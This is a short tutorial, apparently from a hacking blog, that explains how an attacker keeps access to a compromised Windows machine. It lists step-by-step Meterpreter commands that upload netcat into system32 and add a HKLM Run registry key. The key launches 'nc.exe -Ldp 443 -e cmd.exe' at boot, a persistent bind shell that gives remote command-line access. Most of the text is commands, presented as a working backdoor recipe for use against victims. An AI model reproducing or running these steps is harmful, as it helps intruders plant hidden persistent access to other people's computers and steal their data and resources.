When an attacker successfully compromise a system they need to maintain the connection, that's why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.
1 - we must upload netcat to the remote system.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
2 - now we edit in registry to have netcat execute on start up and listen on port 443
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
3 - add our NetCat into start up process
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
4 - To check our backdoor in autorun process or not
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
VIDEO :